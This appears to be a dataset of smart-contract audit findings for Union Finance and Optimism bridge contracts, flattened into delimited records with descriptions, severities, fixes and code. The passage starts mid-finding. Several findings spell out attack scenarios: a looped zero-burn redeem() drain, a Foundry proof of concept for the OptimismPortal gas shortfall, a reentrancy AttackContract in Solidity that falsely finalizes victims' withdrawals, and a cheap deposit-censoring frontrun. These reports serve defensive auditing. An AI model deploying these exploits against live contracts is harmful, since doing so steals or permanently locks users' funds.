What happens is that in the function `_calculateRewardsByBlocks` the if statement is triggered because the user's effectiveStaked == 0. As a result the internal function will return 0 and the cache `uint256 amount` will equal zero.\\n```\\nuint256 amount = _calculateRewardsByBlocks(account, token, pastBlocks, userInfo, globalTotalStaked, user);\\n```\\n\\n```\\nif (user.effectiveStaked == 0 || totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0) {\\n return 0;\\n }\\n```\\n\\nSince the cache `uint256 amount` have a zero value, the if statement in the function `withdrawRewards` will actually be ignored because of `&& amount > 0`. And the else statement will be triggered, which will override Kiki's accrued balance with \"amount\", which is actually zero.\\n```\\nif (unionToken.balanceOf(address(this)) >= amount && amount > 0) {\\n unionToken.safeTransfer(account, amount);\\n users[account][token].accrued = 0;\\n emit LogWithdrawRewards(account, amount);\\n\\n return amount;\\n } else {\\n users[account][token].accrued = amount;\\n emit LogWithdrawRewards(account, 0);\\n\\n return 0;\\n }\\n```\\n\\nBelow you can see the functions which are invoked starting from the function _getUserInfo:\\n```\\n(UserManagerAccountState memory user, Info memory userInfo, uint256 pastBlocks) = _getUserInfo(\\n userManager,\\n account,\\n token,\\n 0\\n );\\n```\\n\\n```\\nfunction _getUserInfo(\\n IUserManager userManager,\\n address account,\\n address token,\\n uint256 futureBlocks\\n ) internal returns (UserManagerAccountState memory user, Info memory userInfo, uint256 pastBlocks) {\\n userInfo = users[account][token];\\n uint256 lastUpdatedBlock = userInfo.updatedBlock;\\n if (block.number < lastUpdatedBlock) {\\n lastUpdatedBlock = block.number;\\n }\\n\\n pastBlocks = block.number - lastUpdatedBlock + futureBlocks;\\n\\n (user.effectiveStaked, user.effectiveLocked, user.isMember) = userManager.onWithdrawRewards(\\n account,\\n pastBlocks\\n );\\n 
}\\n```\\n\\n```\\nfunction onWithdrawRewards(address staker, uint256 pastBlocks)\\n external\\n returns (\\n uint256 effectiveStaked,\\n uint256 effectiveLocked,\\n bool isMember\\n )\\n {\\n if (address(comptroller) != msg.sender) revert AuthFailed();\\n uint256 memberTotalFrozen = 0;\\n (effectiveStaked, effectiveLocked, memberTotalFrozen) = _getEffectiveAmounts(staker, pastBlocks);\\n stakers[staker].stakedCoinAge = 0;\\n stakers[staker].lastUpdated = uint64(block.number);\\n stakers[staker].lockedCoinAge = 0;\\n frozenCoinAge[staker] = 0;\\n getLastWithdrawRewards[staker] = block.number;\\n\\n uint256 memberFrozenBefore = memberFrozen[staker];\\n if (memberFrozenBefore != memberTotalFrozen) {\\n memberFrozen[staker] = memberTotalFrozen;\\n totalFrozen = totalFrozen - memberFrozenBefore + memberTotalFrozen;\\n }\\n\\n isMember = stakers[staker].isMember;\\n }\\n```\\n\\n```\\nfunction _getEffectiveAmounts(address stakerAddress, uint256 pastBlocks)\\n private\\n view\\n returns (\\n uint256,\\n uint256,\\n uint256\\n )\\n {\\n uint256 memberTotalFrozen = 0;\\n CoinAge memory coinAge = _getCoinAge(stakerAddress);\\n\\n uint256 overdueBlocks = uToken.overdueBlocks();\\n uint256 voucheesLength = vouchees[stakerAddress].length;\\n // Loop through all of the stakers vouchees sum their total\\n // locked balance and sum their total currDefaultFrozenCoinAge\\n for (uint256 i = 0; i < voucheesLength; i++) {\\n // Get the vouchee record and look up the borrowers voucher record\\n // to get the locked amount and lastUpdated block number\\n Vouchee memory vouchee = vouchees[stakerAddress][i];\\n Vouch memory vouch = vouchers[vouchee.borrower][vouchee.voucherIndex];\\n\\n uint256 lastRepay = uToken.getLastRepay(vouchee.borrower);\\n uint256 repayDiff = block.number - _max(lastRepay, coinAge.lastWithdrawRewards);\\n uint256 locked = uint256(vouch.locked);\\n\\n if (overdueBlocks < repayDiff && (coinAge.lastWithdrawRewards != 0 || lastRepay != 0)) {\\n memberTotalFrozen += 
locked;\\n if (pastBlocks >= repayDiff) {\\n coinAge.frozenCoinAge += (locked * repayDiff);\\n } else {\\n coinAge.frozenCoinAge += (locked * pastBlocks);\\n }\\n }\\n\\n uint256 lastUpdateBlock = _max(coinAge.lastWithdrawRewards, uint256(vouch.lastUpdated));\\n coinAge.lockedCoinAge += (block.number - lastUpdateBlock) * locked;\\n }\\n\\n return (\\n // staker's total effective staked = (staked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (coinAge.stakedCoinAge - coinAge.frozenCoinAge) / coinAge.diff,\\n // effective locked amount = (locked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (coinAge.lockedCoinAge - coinAge.frozenCoinAge) / coinAge.diff,\\n memberTotalFrozen\\n );\\n }\\n```\\n\\n```\\nfunction _getCoinAge(address stakerAddress) private view returns (CoinAge memory) {\\n Staker memory staker = stakers[stakerAddress];\\n\\n uint256 lastWithdrawRewards = getLastWithdrawRewards[stakerAddress];\\n uint256 diff = block.number - _max(lastWithdrawRewards, uint256(staker.lastUpdated));\\n\\n CoinAge memory coinAge = CoinAge({\\n lastWithdrawRewards: lastWithdrawRewards,\\n diff: diff,\\n stakedCoinAge: staker.stakedCoinAge + diff * uint256(staker.stakedAmount),\\n lockedCoinAge: staker.lockedCoinAge,\\n frozenCoinAge: frozenCoinAge[stakerAddress]\\n });\\n\\n return coinAge;\\n }\\n```\\n\\nBelow you can see the function _calculateRewardsByBlocks:\\n```\\nfunction _calculateRewardsByBlocks(\\n address account,\\n address token,\\n uint256 pastBlocks,\\n Info memory userInfo,\\n uint256 totalStaked,\\n UserManagerAccountState memory user\\n ) internal view returns (uint256) {\\n uint256 startInflationIndex = users[account][token].inflationIndex;\\n\\n if (user.effectiveStaked == 0 || totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0) {\\n return 0;\\n }\\n\\n uint256 rewardMultiplier = _getRewardsMultiplier(user);\\n\\n uint256 curInflationIndex = 
_getInflationIndexNew(totalStaked, pastBlocks);\\n\\n if (curInflationIndex < startInflationIndex) revert InflationIndexTooSmall();\\n\\n return\\n userInfo.accrued +\\n (curInflationIndex - startInflationIndex).wadMul(user.effectiveStaked).wadMul(rewardMultiplier);\\n }\\n```\\nч```\\ncontracts/user/UserManager.sol\\n\\n function unstake(uint96 amount) external whenNotPaused nonReentrant {\\n Staker storage staker = stakers[msg.sender];\\n // Stakers can only unstaked stake balance that is unlocked. Stake balance\\n // becomes locked when it is used to underwrite a borrow.\\n if (staker.stakedAmount - staker.locked < amount) revert InsufficientBalance();\\n comptroller.withdrawRewards(msg.sender, stakingToken);\\n uint256 remaining = IAssetManager(assetManager).withdraw(stakingToken, msg.sender, amount);\\n if (uint96(remaining) > amount) {\\n revert AssetManagerWithdrawFailed();\\n }\\n uint96 actualAmount = amount - uint96(remaining);\\n _updateStakedCoinAge(msg.sender, staker);\\n staker.stakedAmount -= actualAmount;\\n totalStaked -= actualAmount;\\n emit LogUnstake(msg.sender, actualAmount);\\n }\\n```\\n -Attackers can call UToken.redeem() and drain the funds in assetManagerчmediumчAttackers can call `UToken.redeem()` and drain the funds in assetManager, taking advantage of the following vulnerability: due to round error, it is possible that uTokenAmount = 0; the redeem()function does not check whether `uTokenAmount = 0` and will redeem the amount of `underlyingAmount` even when zero uTokens are burned.\\nConsider the following attack scenario:\\nSuppose `exchangeRate = 1000 WAD`, that is each utoken exchanges for 1000 underlying tokens.\\nAttacker B calls `redeem(0, 999)`, then the else-part of the following code will get executed:\\n```\\n if (amountIn > 0) {\\n // We calculate the exchange rate and the amount of underlying to be redeemed:\\n // uTokenAmount = amountIn\\n // underlyingAmount = amountIn x exchangeRateCurrent\\n uTokenAmount = amountIn;\\n 
underlyingAmount = (amountIn * exchangeRate) / WAD;\\n } else {\\n // We get the current exchange rate and calculate the amount to be redeemed:\\n // uTokenAmount = amountOut / exchangeRate\\n // underlyingAmount = amountOut\\n uTokenAmount = (amountOut * WAD) / exchangeRate;\\n underlyingAmount = amountOut;\\n }\\n```\\n\\nwe have `uTokenAmount = 999*WAD/1000WAD = 0`, and `underlyingAmount = 999`.\\nSince `redeem()` does not check whether `uTokenAmount = 0`, the function will proceed. When finished, the attacker will get 999 underlying tokens, but burned no utokens. He stole 999 underlying tokens.\\nThe attacker can accomplish draining the `assetManager` by writing a malicious contract/function using a loop to run `redeem(0, exchangeRate/WAD-1)` multiple times (as long as it does not run out of gas) and will be able to steal more funds in one SINGLE transaction. Running this transaction a few times will drain `assetManager` easily. This attack will be successful when `exchangeRate/WAD-1 > 0`. Here we need to consider that `exchangeRate` might change due to the decreasing of `totalRedeemable`. 
So in each iteration, when we call `redeem(0, exchangeRate/WAD-1)`, the second argument is recalculated.чIssue Attackers can call UToken.redeem() and drain the funds in assetManager\\nRevise `redeem()` so that it will revert when `uTokenAmount = 0`.чAn attacker can keep calling redeem() and drain the funds in `assetManager`.ч```\\n if (amountIn > 0) {\\n // We calculate the exchange rate and the amount of underlying to be redeemed:\\n // uTokenAmount = amountIn\\n // underlyingAmount = amountIn x exchangeRateCurrent\\n uTokenAmount = amountIn;\\n underlyingAmount = (amountIn * exchangeRate) / WAD;\\n } else {\\n // We get the current exchange rate and calculate the amount to be redeemed:\\n // uTokenAmount = amountOut / exchangeRate\\n // underlyingAmount = amountOut\\n uTokenAmount = (amountOut * WAD) / exchangeRate;\\n underlyingAmount = amountOut;\\n }\\n```\\n -Malicious user can finalize other's withdrawal with less than specified gas limit, leading to loss of fundsчhighчTransactions to execute a withdrawal from the Optimism Portal can be sent with 5122 less gas than specified by the user, because the check is performed a few operations prior to the call. Because there are no replays on this contract, the result is that a separate malicious user can call `finalizeWithdrawalTransaction()` with a precise amount of gas, cause the withdrawer's withdrawal to fail, and permanently lock their funds.\\nWithdrawals can be initiated directly from the `L2ToL1MessagePasser` contract on L2. These withdrawals can be withdrawn directly from the `OptimismPortal` on L1. This path is intended to be used only by users who know what they are doing, presumably to save the gas of going through the additional more “user-friendly” contracts.\\nOne of the quirks of the `OptimismPortal` is that there is no replaying of transactions. If a transaction fails, it will simply fail, and all ETH associated with it will remain in the `OptimismPortal` contract. 
Users have been warned of this and understand the risks, so Optimism takes no responsibility for user error.\\nHowever, there is an issue in the implementation of `OptimismPortal` that a withdrawal transaction can be executed with 5122 gas less than the user specified. In many cases, this could cause their transaction to revert, without any user error involved. Optimism is aware of the importance of this property being correct when they write in the comments:\\nWe want to maintain the property that the amount of gas supplied to the call to the target contract is at least the gas limit specified by the user. We can do this by enforcing that, at this point in time, we still have gaslimit + buffer gas available.\\nThis property is not maintained because of the gap between the check and the execution.\\nThe check is as follows, where FINALIZE_GAS_BUFFER == 20_000:\\n```\\nrequire(\\n gasleft() >= _tx.gasLimit + FINALIZE_GAS_BUFFER,\\n \"OptimismPortal: insufficient gas to finalize withdrawal\"\\n);\\n```\\n\\nAfter this check, we know that the current execution context has at least 20,000 more gas than the gas limit. 
However, we then proceed to spend gas by (a) assigning the `l2Sender` storage variable, which uses 2900 gas because it's assigning from a non-zero value, and (b) perform some additional operations to prepare the contract for the external call.\\nThe result is that, by the time the call is sent with `gasleft()` - FINALIZE_GAS_BUFFER gas, `gasleft()` is 5122 lower than it was in the initial check.\\nMathematically, this can be expressed as:\\n`gasAtCheck >= gasLimit + 20000`\\n`gasSent == gasAtCall - 20000`\\n`gasAtCall == gasAtCheck - 5122`\\nRearranging, we get `gasSent >= gasLimit + 20000 - 5122 - 20000`, which simplifies to `gasSent >= gasLimit - 5122`.чInstead of using one value for `FINALIZE_GAS_BUFFER`, two separate values should be used that account for the gas used between the check and the call.чFor any withdrawal where a user sets their gas limit within 5122 of the actual gas their execution requires, a malicious user can call `finalizeWithdrawalTransaction()` on their behalf with enough gas to pass the check, but not enough for execution to succeed.\\nThe result is that the withdrawing user will have their funds permanently locked in the `OptimismPortal` contract.\\nProof of Concept\\nTo test this behavior in a sandboxed environment, you can copy the following proof of concept.\\nHere are three simple contracts that replicate the behavior of the Portal, as well as an external contract that uses a predefined amount of gas.\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nlibrary SafeCall {\\n /**\\n * @notice Perform a low level call without copying any returndata\\n *\\n * @param _target Address to call\\n * @param _gas Amount of gas to pass to the call\\n * @param _value Amount of value to pass to the call\\n * @param _calldata Calldata to pass to the call\\n */\\n function call(\\n address _target,\\n uint256 _gas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n assembly {\\n 
_success := call(\\n _gas, // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 0x20), // inloc\\n mload(_calldata), // inlen\\n 0, // outloc\\n 0 // outlen\\n )\\n }\\n return _success;\\n }\\n}\\n\\ncontract GasUser {\\n uint[] public s;\\n\\n function store(uint i) public {\\n for (uint j = 0; j < i; j++) {\\n s.push(1);\\n }\\n }\\n}\\n\\ncontract Portal {\\n address l2Sender;\\n\\n struct Transaction {\\n uint gasLimit;\\n address sender;\\n address target;\\n uint value;\\n bytes data;\\n }\\n\\n constructor(address _l2Sender) {\\n l2Sender = _l2Sender;\\n }\\n\\n function execute(Transaction memory _tx) public {\\n require(\\n gasleft() >= _tx.gasLimit + 20000,\\n \"OptimismPortal: insufficient gas to finalize withdrawal\"\\n );\\n\\n // Set the l2Sender so contracts know who triggered this withdrawal on L2.\\n l2Sender = _tx.sender;\\n\\n // Trigger the call to the target contract. We use SafeCall because we don't\\n // care about the returndata and we don't want target contracts to be able to force this\\n // call to run out of gas via a returndata bomb.\\n bool success = SafeCall.call(\\n _tx.target,\\n gasleft() - 20000,\\n _tx.value,\\n _tx.data\\n );\\n }\\n}\\n```\\n\\nHere is a Foundry test that calls the Portal with various gas values to expose this vulnerability:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"../src/Portal.sol\";\\n\\ncontract PortalGasTest is Test {\\n Portal public c;\\n GasUser public gu;\\n\\n function setUp() public {\\n c = new Portal(0x000000000000000000000000000000000000dEaD);\\n gu = new GasUser();\\n }\\n\\n function testGasLimitForGU() public {\\n gu.store{gas: 44_602}(1);\\n assert(gu.s(0) == 1);\\n }\\n\\n function _executePortalWithGivenGas(uint gas) public {\\n c.execute{gas: gas}(Portal.Transaction({\\n gasLimit: 44_602,\\n sender: address(69),\\n target: address(gu),\\n value: 0,\\n data: 
abi.encodeWithSignature(\"store(uint256)\", 1)\\n }));\\n }\\n\\n function testPortalCatchesGasTooSmall() public {\\n vm.expectRevert(bytes(\"OptimismPortal: insufficient gas to finalize withdrawal\"));\\n _executePortalWithGivenGas(65681);\\n }\\n\\n function testPortalSucceedsWithEnoughGas() public {\\n _executePortalWithGivenGas(70803);\\n assert(gu.s(0) == 1);\\n }\\n\\n function testPortalBugWithInBetweenGasLow() public {\\n _executePortalWithGivenGas(65682);\\n \\n // It now reverts because the array has a length of 0.\\n vm.expectRevert();\\n gu.s(0);\\n }\\n\\n function testPortalBugWithInBetweenGasHigh() public {\\n _executePortalWithGivenGas(70802);\\n \\n // It now reverts because the array has a length of 0.\\n vm.expectRevert();\\n gu.s(0);\\n }\\n}\\n```\\n\\nSummarizing the results of this test:\\nWe verify that the call to the target contract succeeds with 44,602 gas, and set that as gasLimit for all tests.\\nWhen we send 65,681 or less gas, it's little enough to be caught by the require statement.\\nWhen we send 70,803 or more gas, the transaction will succeed.\\nWhen we send any amount of gas between these two values, the require check is passed but the transaction fails.ч```\\nrequire(\\n gasleft() >= _tx.gasLimit + FINALIZE_GAS_BUFFER,\\n \"OptimismPortal: insufficient gas to finalize withdrawal\"\\n);\\n```\\n -Causing users lose their fund during finalizing withdrawal transactionчhighчA malicious user can make users lose their fund during finalizing their withdrawal. 
This is possible due to presence of reentrancy guard on the function `relayMessage`.\\nBob (a malicious user) creates a contract (called AttackContract) on L1.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.0;\\n\\nstruct WithdrawalTransaction {\\n uint256 nonce;\\n address sender;\\n address target;\\n uint256 value;\\n uint256 gasLimit;\\n bytes data;\\n}\\n\\ninterface IOptimismPortal {\\n function finalizeWithdrawalTransaction(WithdrawalTransaction memory _tx)\\n external;\\n}\\n\\ncontract AttackContract {\\n bool public donotRevert;\\n bytes metaData;\\n address optimismPortalAddress;\\n\\n constructor(address _optimismPortal) {\\n optimismPortalAddress = _optimismPortal;\\n }\\n\\n function enableRevert() public {\\n donotRevert = true;\\n }\\n\\n function setMetaData(WithdrawalTransaction memory _tx) public {\\n metaData = abi.encodeWithSelector(\\n IOptimismPortal.finalizeWithdrawalTransaction.selector,\\n _tx\\n );\\n }\\n\\n function attack() public {\\n if (!donotRevert) {\\n revert();\\n } else {\\n optimismPortalAddress.call(metaData);\\n }\\n }\\n}\\n```\\n\\n```\\n if (!donotRevert) {\\n revert();\\n }\\n```\\n\\nThen, Bob calls the function `enableRevert` to set `donotRevert` to `true`. So that if later the function `attack()` is called again, it will not revert.\\n```\\n function enableRevert() public {\\n donotRevert = true;\\n }\\n```\\n\\nThen, Bob notices that Alice is withdrawing large amount of fund from L2 to L1. 
Her withdrawal transaction is proved but she is waiting for the challenge period to be finished to finalize it.\\nThen, Bob calls the function `setMetaData` on the contract `AttackContract` with the following parameter:\\n`_tx` = Alice's withdrawal transaction\\nBy doing so, the `metaData` will be equal to `finalizeWithdrawalTransaction.selector` + Alice's withdrawal transaction.\\n```\\n function setMetaData(WithdrawalTransaction memory _tx) public {\\n metaData = abi.encodeWithSelector(\\n IOptimismPortal.finalizeWithdrawalTransaction.selector,\\n _tx\\n );\\n }\\n```\\n\\nNow, after the challenge period is passed, and before the function `finalizeWithdrawalTransaction` is called by anyone (Alice), Bob calls the function `relayMessage` with the required data to retry his previous failed message again.\\nThis time, since `donotRevert` is `true`, the call to function `attack()` will not revert, instead the body of `else clause` will be executed.\\n```\\n else {\\n optimismPortalAddress.call(metaData);\\n }\\n```\\n\\nIn summary the attack is as follows:\\nBob creates a malicious contract on L1 called `AttackContract`.\\nBob sends a message from L2 to L1 to call the function `AttackContract.attack` on L1.\\nOn L1 side, after the challenge period is passed, the function `AttackContract.attack` will be called.\\nMessage relay on L1 will be unsuccessful, because the function `AttackContract.attack` reverts. 
So, Bob's message will be flagged as failed message.\\nBob sets `AttackContract.donotRevert` to true.\\nBob waits for an innocent user to request withdrawal transaction.\\nBob waits for the innocent user's withdrawal transaction to be proved.\\nBob sets meta data in his malicious contract based on the innocent user's withdrawal transaction.\\nBob waits for the challenge period to be passed.\\nAfter the challenge period is elapsed, Bob retries to relay his failed message again.\\n`CrossDomainMessenger.relayMessage` will call the `AttackContract.attack`, then it calls `OptimismPortal.finalizeWithdrawalTransaction` to finalize innocent user's withdrawal transaction. Then, it calls `CrossDomainMessenger.relayMessage`, but it will be unsuccessful because of reentrancy guard.\\nAfter finalizing the innocent user's withdrawal transaction, Bob's message will be flagged as successful.\\nSo, innocent user's withdrawal transaction is flagged as finalized, while it is not.ч```\\n try IL1CrossDomainMessanger.relayMessage(// rest of code) {} catch Error(string memory reason) {\\n if (\\n keccak256(abi.encodePacked(reason)) ==\\n keccak256(abi.encodePacked(\"ReentrancyGuard: reentrant call\"))\\n ) {\\n revert(\"finalizing should be reverted\");\\n }\\n }\\n```\\nчBy doing this attack it is possible to prevent users from withdrawing their fund. 
Moreover, they lose their fund because withdrawal is flagged as finalized, but the withdrawal sent to `L1CrossDomainMessanger` was not successful.ч```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.0;\\n\\nstruct WithdrawalTransaction {\\n uint256 nonce;\\n address sender;\\n address target;\\n uint256 value;\\n uint256 gasLimit;\\n bytes data;\\n}\\n\\ninterface IOptimismPortal {\\n function finalizeWithdrawalTransaction(WithdrawalTransaction memory _tx)\\n external;\\n}\\n\\ncontract AttackContract {\\n bool public donotRevert;\\n bytes metaData;\\n address optimismPortalAddress;\\n\\n constructor(address _optimismPortal) {\\n optimismPortalAddress = _optimismPortal;\\n }\\n\\n function enableRevert() public {\\n donotRevert = true;\\n }\\n\\n function setMetaData(WithdrawalTransaction memory _tx) public {\\n metaData = abi.encodeWithSelector(\\n IOptimismPortal.finalizeWithdrawalTransaction.selector,\\n _tx\\n );\\n }\\n\\n function attack() public {\\n if (!donotRevert) {\\n revert();\\n } else {\\n optimismPortalAddress.call(metaData);\\n }\\n }\\n}\\n```\\n -Censorship resistance is undermined and bridging of assets can be DOSed at low costчmediumчAll L1->L2 transactions go through OptimismPortal's `depositTransaction` function. It is wrapped through the `metered` modifier. The goal is to create a gas market for L1->L2 transactions and not allow L1 TXs to fill up L2 batches (as the gas for deposit TX in L2 is payed for by the system), but the mechanism used makes it too inexpensive for a malicious user to DOS and censor deposits.\\nIt is possible for a malicious actor to snipe arbitrary L1->L2 transactions in the mempool for far too cheaply. 
This introduces two impacts:\\nUndermines censorship resistance guarantees by Optimism\\nGriefs users who simply want to bridge assets to L2\\nThe core issue is the check in ResourceMetering.sol:\\n```\\n// Make sure we can actually buy the resource amount requested by the user.\\nparams.prevBoughtGas += _amount;\\nrequire(\\n    int256(uint256(params.prevBoughtGas)) <= MAX_RESOURCE_LIMIT,\\n    \"ResourceMetering: cannot buy more gas than available gas limit\"\\n);\\n```\\n\\nNote that `params.prevBoughtGas` is reset per block. This means an attacker can view a TX in the mempool and wrap up the following flashbot bundle:\\nAttacker TX to `depositTransaction`, with gasLimit = 8M (MAX_RESOURCE_LIMIT)\\nVictim TX to `depositTransaction`\\nThe result is that attacker's transaction will execute and victim's TX would revert. It is unknown how this affects the UI and whether victim would be able to resubmit this TX again easily, but regardless it's clearly griefing user's attempt to bridge an asset. Note that a reverted TX is different from an uncompleted TX from a UX point of view.\\nFrom a censorship resistance perspective, there is nothing inherently preventing the attacker from continually using this technique to block out all TXs, albeit gas metering price will rise as will be discussed.\\nNow we can demonstrate the cost of the attack to be low. Gas burned by the modifier is calculated as:\\n```\\n// Determine the amount of ETH to be paid.\\nuint256 resourceCost = _amount * params.prevBaseFee;\\n// rest of code\\nuint256 gasCost = resourceCost / Math.max(block.basefee, 1000000000);\\n```\\n\\n`params.prevBaseFee` is initialized at 1e9 and goes up per block by a factor of 1.375 when gas market is drained, while going down by 0.875 when gas market wasn't used at all.\\nIf we take the initial value, `resourceCost = 8e6 * 1e9 = 8e15`. If we assume tip is negligible to `block.basefee`, L1 gas cost in ETH equals `resourceCost` (divide by basefee and multiply by basefee). 
Therefore, cost of this snipe TX is:\\n`8e15 / 1e18 (ETH decimals) * 1600 (curr ETH price) = $12.80`\\nThe result is an extremely low price to pay, and even taking into account extra tips for frontrunning, is easily achievable.\\nIn practice `prevBaseFee` will represent the market price for L2 gas. If it goes lower than initial value, DOSing will become cheaper, while if it goes higher it will become more expensive. The key problem is that the attacker's cost is too similar to the victim's cost. If victim is trying to pass a 400k TX, attacker needs to buy a 7.6M of gas. This gap is too small and the resulting situation is that for DOS to be too expensive for attacker, TX would have to be far too expensive for the average user.чIt is admittedly difficult to balance the need for censorship resistance with the prevention of L2 flooding via L1 TXs. However, the current solution which will make a victim's TX revert at hacker's will is inadequate and will lead to severe UX issues for users.чCensorship resistance is undermined and bridging of assets can be DOSed at low cost.ч```\\n// Make sure we can actually buy the resource amount requested by the user.\\nparams.prevBoughtGas += _amount;\\nrequire(\\n int256(uint256(params.prevBoughtGas)) <= MAX_RESOURCE_LIMIT,\\n \"ResourceMetering: cannot buy more gas than available gas limit\"\\n);\\n```\\n -[High] Function MigrateWithdrawal() may set gas limit so high for old withdrawals when migrating them by mistake and they can't be relayed in the L1 and users funds would be lostчmediumчFunction `MigrateWithdrawal()` in migrate.go will turn a LegacyWithdrawal into a bedrock style Withdrawal. it should set a min gas limit value for the withdrawals. 
to calculate a gas limit contract overestimates it and if the value goes higher than L1 maximum gas in the block then the withdraw can't be relayed in the L1 and users funds would be lost while the withdraw could be possible before the migration it won't be possible after it.\\nThis is `MigrateWithdrawal()` code:\\n```\\n// MigrateWithdrawal will turn a LegacyWithdrawal into a bedrock\\n// style Withdrawal.\\nfunc MigrateWithdrawal(withdrawal *LegacyWithdrawal, l1CrossDomainMessenger *common.Address) (*Withdrawal, error) {\\n // Attempt to parse the value\\n value, err := withdrawal.Value()\\n if err != nil {\\n return nil, fmt.Errorf(\"cannot migrate withdrawal: %w\", err)\\n }\\n\\n abi, err := bindings.L1CrossDomainMessengerMetaData.GetAbi()\\n if err != nil {\\n return nil, err\\n }\\n\\n // Migrated withdrawals are specified as version 0. Both the\\n // L2ToL1MessagePasser and the CrossDomainMessenger use the same\\n // versioning scheme. Both should be set to version 0\\n versionedNonce := EncodeVersionedNonce(withdrawal.Nonce, new(big.Int))\\n // Encode the call to `relayMessage` on the `CrossDomainMessenger`.\\n // The minGasLimit can safely be 0 here.\\n data, err := abi.Pack(\\n \"relayMessage\",\\n versionedNonce,\\n withdrawal.Sender,\\n withdrawal.Target,\\n value,\\n new(big.Int),\\n withdrawal.Data,\\n )\\n if err != nil {\\n return nil, fmt.Errorf(\"cannot abi encode relayMessage: %w\", err)\\n }\\n\\n // Set the outer gas limit. 
This cannot be zero\\n gasLimit := uint64(len(data)*16 + 200_000)\\n\\n w := NewWithdrawal(\\n versionedNonce,\\n &predeploys.L2CrossDomainMessengerAddr,\\n l1CrossDomainMessenger,\\n value,\\n new(big.Int).SetUint64(gasLimit),\\n data,\\n )\\n return w, nil\\n}\\n```\\n\\nAs you can see it sets the gas limit as `gasLimit := uint64(len(data)*16 + 200_000)` and the contract sets 16 gas per data byte but in Ethereum when a data byte is 0 then the overhead intrinsic gas is 4 and the contract overestimates the gas limit by setting 16 gas for each data byte. This can cause messages with big data (whose calculated gas is higher than 30M) to not be relayable in the L1 because if transaction gas is set lower than the calculated gas then OptimismPortal would reject it and if gas is set higher than the calculated gas then miners would reject the transaction. Meanwhile, if the code correctly estimated the required gas, the gas limit could be lower by a factor of 4. For example a message with about 2M zeros would get a gas limit higher than 30M and it won't be withdrawable in the L1 while the real gas limit is 8M which is relayable.чcalculate gas estimation correctly, 4 for zero bytes and 16 for non-zero bytes.чsome withdraw messages from L2 to L1 that could be relayed before the migration can't be relayed after the migration because of the wrong gas estimation.ч```\\n// MigrateWithdrawal will turn a LegacyWithdrawal into a bedrock\\n// style Withdrawal.\\nfunc MigrateWithdrawal(withdrawal *LegacyWithdrawal, l1CrossDomainMessenger *common.Address) (*Withdrawal, error) {\\n // Attempt to parse the value\\n value, err := withdrawal.Value()\\n if err != nil {\\n return nil, fmt.Errorf(\"cannot migrate withdrawal: %w\", err)\\n }\\n\\n abi, err := bindings.L1CrossDomainMessengerMetaData.GetAbi()\\n if err != nil {\\n return nil, err\\n }\\n\\n // Migrated withdrawals are specified as version 0. Both the\\n // L2ToL1MessagePasser and the CrossDomainMessenger use the same\\n // versioning scheme. 
Both should be set to version 0\\n versionedNonce := EncodeVersionedNonce(withdrawal.Nonce, new(big.Int))\\n // Encode the call to `relayMessage` on the `CrossDomainMessenger`.\\n // The minGasLimit can safely be 0 here.\\n data, err := abi.Pack(\\n \"relayMessage\",\\n versionedNonce,\\n withdrawal.Sender,\\n withdrawal.Target,\\n value,\\n new(big.Int),\\n withdrawal.Data,\\n )\\n if err != nil {\\n return nil, fmt.Errorf(\"cannot abi encode relayMessage: %w\", err)\\n }\\n\\n // Set the outer gas limit. This cannot be zero\\n gasLimit := uint64(len(data)*16 + 200_000)\\n\\n w := NewWithdrawal(\\n versionedNonce,\\n &predeploys.L2CrossDomainMessengerAddr,\\n l1CrossDomainMessenger,\\n value,\\n new(big.Int).SetUint64(gasLimit),\\n data,\\n )\\n return w, nil\\n}\\n```\\n -Migration can be bricked by sending a message directly to the LegacyMessagePasserчmediumчThe migration process halts and returns an error if any of the withdrawal data breaks from the specified format. However, the data for this migration comes from every call that has been made to the LegacyMessagePasser (0x00) address, and it is possible to send a transaction that would violate the requirements. The result is that the migration process would be bricked and need to be rebuilt, with some difficult technical challenges that we'll outline below.\\nWithdrawal data is saved in l2geth whenever a call is made to the LegacyMessagePasser address:\\n```\\nif addr == dump.MessagePasserAddress {\\n statedumper.WriteMessage(caller.Address(), input)\\n}\\n```\\n\\nThis will save all the calls that came via the L2CrossDomainMessenger. The expected format for the data is encoded in the L2CrossDomainMessenger. 
It encodes the calldata to be executed on the L1 side as: `abi.encodeWithSignature(\"relayMessage(...)\", target, sender, message, nonce)`\\nThe migration process expects the calldata to follow this format, and expects the call to come from L2CrossDomainMessenger, implemented with the following two checks:\\n```\\nselector := crypto.Keccak256([]byte(\"relayMessage(address,address,bytes,uint256)\"))[0:4]\\nif !bytes.Equal(data[0:4], selector) {\\n    return fmt.Errorf(\"invalid selector: 0x%x\", data[0:4])\\n}\\n\\nmsgSender := data[len(data)-len(predeploys.L2CrossDomainMessengerAddr):]\\nif !bytes.Equal(msgSender, predeploys.L2CrossDomainMessengerAddr.Bytes()) {\\n    return errors.New(\"invalid msg.sender\")\\n}\\n```\\n\\nThe migration process will be exited and the migration will fail if this assumption is violated.\\nHowever, since the function on the LegacyMessagePasser is public, it can also be called directly with arbitrary calldata:\\n```\\nfunction passMessageToL1(bytes memory _message) external {\\n    sentMessages[keccak256(abi.encodePacked(_message, msg.sender))] = true;\\n}\\n```\\n\\nThis allows us to submit calldata that would violate both of these checks and cause the migration to panic and fail.\\nWhile it may seem easy to filter these withdrawals out and rerun the migration, this solution would not work either. That's because, later in the process, we check that each storage slot in the LegacyMessagePasser contract has a corresponding withdrawal in the migration:\\n```\\nfor slot := range slotsAct {\\n    _, ok := slotsInp[slot]\\n    if !ok {\\n        return nil, fmt.Errorf(\"unknown storage slot in state: %s\", slot)\\n    }\\n}\\n```\\n\\nThe result is that the Optimism team would need to unwind the migration, develop a new migration process to account for this issue, and remigrate with an untested system.
